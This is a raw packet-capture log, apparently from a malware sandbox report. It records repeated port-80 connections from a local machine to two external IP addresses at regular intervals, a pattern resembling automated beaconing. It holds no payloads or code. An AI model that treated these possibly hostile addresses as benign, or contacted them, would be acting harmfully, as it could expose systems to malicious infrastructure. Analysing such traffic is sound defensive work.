                                                                            Oct 14, 2024 01:52:44.583055019 CEST8049751189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:44.586193085 CEST8049751189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:44.586287022 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.586338043 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.589433908 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.591711044 CEST8049751189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:44.594584942 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:44.594676018 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.594820976 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.594852924 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:44.600387096 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:44.600425005 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.700979948 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.701046944 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.701212883 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.701253891 CEST4975280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.704319000 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.706351995 CEST8049752189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.709861040 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.710191011 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.710191965 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.710191965 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:45.715812922 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:45.716470957 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.816863060 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.816910028 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.817207098 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.817327976 CEST4975380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.820899010 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.823002100 CEST8049753189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.826349020 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.826455116 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.826585054 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.826607943 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:46.831717968 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:46.831800938 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.921842098 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.921871901 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.922152042 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.922468901 CEST4975480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.925478935 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.927740097 CEST8049754189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.930958033 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.931061029 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.931195021 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.931227922 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:47.936220884 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:47.936261892 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.045856953 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.045907021 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.045984983 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.046135902 CEST4975580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.049176931 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.051246881 CEST8049755189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.054507971 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.054605007 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.054759026 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.054791927 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:49.059986115 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:49.060026884 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.187657118 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.192949057 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.193028927 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.193067074 CEST4975680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.196022034 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.198364019 CEST8049756189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.201195002 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.201419115 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.201419115 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.201419115 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:50.206924915 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:50.206953049 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.527635098 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.533226013 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.533324957 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.533411026 CEST4975780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.536586046 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.538320065 CEST8049757189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.541495085 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.541585922 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.541734934 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.541734934 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:51.546936035 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:51.546967030 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.671621084 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.671694994 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.671963930 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.672009945 CEST4975880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.674043894 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.676868916 CEST8049758189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.678994894 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.679081917 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.679179907 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.679209948 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:52.684351921 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:52.684380054 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.788449049 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.788889885 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.788983107 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.789098024 CEST4975980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.791578054 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.794078112 CEST8049759189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.796813011 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.799993992 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.800121069 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.800148964 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:53.805656910 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:53.805697918 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.895823002 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.895917892 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.895987988 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.896083117 CEST4976080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.900985956 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.901808977 CEST8049760189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.906548023 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.906769991 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.906866074 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.906898022 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:54.912614107 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:54.912653923 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:55.999577999 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:55.999865055 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:56.000149965 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.000149965 CEST4976180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.002588987 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.006042004 CEST8049761189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:56.007834911 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:56.008057117 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.008057117 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.008057117 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:56.013331890 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:56.013417006 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.098568916 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.098784924 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.098913908 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.099947929 CEST4976280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.104788065 CEST8049762189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.106440067 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.113982916 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.114072084 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.114233971 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.114264011 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:57.121006012 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:57.121057987 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.208302975 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.208472013 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.208548069 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.208636999 CEST4976380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.212496042 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.213665009 CEST8049763189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.217425108 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.217502117 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.217596054 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.217612028 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:58.222853899 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:58.222867966 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.308052063 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.308142900 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.308214903 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.308512926 CEST4976680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.312824965 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.313508034 CEST8049766189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.317754984 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.317873001 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.318584919 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.318584919 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:59.323476076 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:59.323489904 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.410244942 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.410334110 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.410404921 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.410528898 CEST4977280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.412744045 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.415455103 CEST8049772189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.417757988 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.417833090 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.418123960 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.418123960 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:00.423209906 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:00.423501015 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.541305065 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.541534901 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.541616917 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.541697025 CEST4978380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.543881893 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.546633005 CEST8049783189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.549751043 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.549827099 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.549936056 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.549978018 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:01.555916071 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:01.555946112 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.669269085 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.669487000 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.669552088 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.670196056 CEST4978980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.673273087 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.675467968 CEST8049789189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.678237915 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.678303957 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.678565979 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.678565979 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:02.683708906 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:02.684586048 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.768182993 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.768251896 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.768388033 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.768560886 CEST4979780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.772875071 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.773360968 CEST8049797189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.777806044 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.777878046 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.778011084 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.778024912 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:03.783148050 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:03.783263922 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.904217958 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.909857035 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.909930944 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.912894011 CEST4980680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.917814970 CEST8049806189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.987200975 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.992111921 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.992206097 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.992335081 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.992361069 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:04.997240067 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:04.997422934 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:06.098270893 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:06.098501921 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:53:06.098598957 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:06.098675966 CEST4981280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:53:06.103533983 CEST8049812189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:54:15.448882103 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:15.453952074 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:15.454190016 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:15.511869907 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:15.511869907 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:15.516829014 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:15.517102003 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:18.021929979 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:18.022150040 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:18.022227049 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:18.022279024 CEST5003780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:18.027142048 CEST805003758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:22.517494917 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:22.522993088 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:22.523197889 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:22.523246050 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:22.523262978 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:22.528127909 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:22.528563976 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:25.117286921 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:25.117326975 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:25.117522001 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:25.117578983 CEST5003880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:25.122562885 CEST805003858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:29.624329090 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:29.629518986 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:29.629622936 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:29.629760027 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:29.629771948 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:29.634715080 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:29.634879112 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:31.239456892 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:31.240447044 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:31.240509987 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:31.240546942 CEST5003980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:31.246912956 CEST805003958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:35.417798042 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:35.423034906 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:35.423322916 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:35.423472881 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:35.423472881 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:35.429430962 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:35.429456949 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:37.062496901 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:37.062875032 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:37.062971115 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:37.063061953 CEST5004080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:37.068008900 CEST805004058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:42.296602011 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:42.301887989 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:42.302007914 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:42.302177906 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:42.302210093 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:42.307053089 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:42.307451963 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:43.975779057 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:43.976774931 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:43.976866007 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:43.979399920 CEST5004180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:43.984313011 CEST805004158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:48.575867891 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:48.581134081 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:48.581258059 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:48.581429005 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:48.581461906 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:48.586329937 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:48.586361885 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:50.179156065 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:50.199232101 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:50.199291945 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:50.199413061 CEST5004280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:50.204415083 CEST805004258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:55.391624928 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:55.412868023 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:55.413130999 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:55.413235903 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:55.413260937 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:55.420443058 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:55.420490026 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:56.987704039 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:56.989906073 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:54:56.990012884 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:56.990103960 CEST5004380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:54:56.995096922 CEST805004358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:01.430545092 CEST5004480192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:01.435676098 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:01.435777903 CEST5004480192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:01.435952902 CEST5004480192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:01.435983896 CEST5004480192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:01.440944910 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:01.440984964 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:03.107470036 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:03.109678030 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:03.109843969 CEST5004480192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:03.109844923 CEST5004480192.168.2.458.151.148.90
